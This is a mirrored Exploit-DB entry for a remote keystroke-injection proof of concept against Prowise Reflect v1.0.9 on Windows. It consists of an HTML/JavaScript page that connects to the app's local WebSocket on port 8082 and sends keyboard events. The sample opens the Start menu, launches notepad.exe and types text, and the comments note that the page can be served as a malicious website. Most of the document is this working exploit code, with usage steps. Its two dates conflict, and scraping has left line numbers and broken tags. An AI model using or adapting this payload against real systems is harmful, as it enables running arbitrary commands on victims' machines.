Prowise Reflect v1.0.9 – Remote Keystroke Injection - 体验盒子

作者： Rik Lutz

日期： 2022-03-02

类别：

remote

平台：

windows

来源：https://www.exploit-db.com/exploits/50796/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

# Exploit Title: Prowise Reflect v1.0.9 - Remote Keystroke Injection

# Date: 30/10/2022

# Exploit Author: Rik Lutz

# Vendor Homepage: https://www.prowise.com/

# Version: V1.0.9

# Tested on: Windows 10

# Prowise Reflect software version 1.0.9 for Windows is vulnerable to a remote keystroke injection.

# Much like how a rubber ducky attack works but this works either over the network (when port 8082 is exposed),

# or by visiting a malicious website. This POC contains the malicious webpage.

# Steps:

# 1. Start Prowise reflect

# 2. Try to connect to a reflect server e.q. ygm7u6od

# 3. When it is connecting click exploit

# - Start menu will open, types notepad.exe and types hello world.

<!DOCTYPE HTML>

<html>

<head>

function wait(ms){

var start = new Date().getTime();

var end = start;

while(end < start + ms) {

end = new Date().getTime();

}

function WebSocketTest() {

var StateConnecting = new Boolean(false);

if ("WebSocket" in window) {

// Let us open a web socket

var ws = new WebSocket("ws://localhost:8082");

ws.onopen = function() {

ws.send('{"event":"keyboard", "key":"super"}');

wait(400);

//character is slower

// ws.send('{"event":"keyboard", "character":"notepad.exe"}'};

// You can check for connecting state by sending {"event":"setupRTCConnection", "remoteName":"a"} if the response is {"event":"streamAvailable"} getIsConnecting == true

var exploitcode = "notepad.exe"

for (let i = 0; i < exploitcode.length; i++) {

ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');

}

wait(300);

ws.send('{"event":"keyboard", "key":"enter"}');

wait(2000);

exploitcode = "Hello world!"

for (let i = 0; i < exploitcode.length; i++) {

ws.send('{"event":"keyboard", "key":"' + exploitcode[i] + '"}');

}

wait(200);

};

ws.onmessage = function (evt) {

var received_msg = evt.data;

};

ws.onclose = function() {

// websocket is closed.

alert("Connection is closed...");

};

} else {

// The browser doesn't support WebSocket

alert("WebSocket NOT supported by your Browser!");

}

</script>

</head>

<body>

<a href = "javascript:WebSocketTest()">Exploit!</a>

</div>

</body>

</html>